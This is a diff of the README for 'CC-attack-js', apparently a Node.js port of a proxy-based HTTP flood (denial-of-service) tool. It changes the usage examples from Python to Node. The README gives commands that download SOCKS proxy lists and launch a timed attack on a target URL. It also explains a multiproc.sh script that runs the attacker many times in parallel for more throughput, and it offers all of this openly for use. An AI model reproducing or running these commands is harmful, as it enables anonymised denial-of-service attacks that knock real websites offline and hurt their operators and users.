eymeen/CC-attack-js/README.md

 ### Some example of the usage
 Download socks5 proxies as proxy.txt:
 ```
-python3 cc.py -down -f proxy.txt -v 5
+node cc.js -down -f proxy.txt -v 5
 ```
 Attack a target with custom proxies list(socks4.txt) for 30 seconds :
 ```
-python3 cc.py -url http://target.com -f socks4.txt -v 4 -s 30
+node cc.js -url http://target.com -f socks4.txt -v 4 -s 30
 ```

 ## Usage of multiproc.sh
 ```
-This script is using for increasing the performance of cc.py.
+This script is using for increasing the performance of cc.js.
 Due to the suck performance of python since it has a GIL lock,
-And I am lazy to make a multiprocess version.
+And the main repo owner was lazy to make a multiprocess version.
+I'm lazy too and wont make it with node, even though Node has multiprocess.
-There is a option for linux user to increase their performance of cc.py
+There is a option for linux user to increase their performance of cc.js

-This script basicly just run cc.py multiple times to make it "multi-processing"
+This script basicly just run cc.js multiple times to make it "multi-processing"

-First, put this script and cc.py in the same folder.
+First, put this script and cc.js in the same folder.

-Then prepare the proxies list by yourself or just run "python3 cc.py -down -v 4" (-v socks version)
+Then prepare the proxies list by yourself or just run "node cc.js -down -v 4" (-v socks version)

 After that, change the number of process.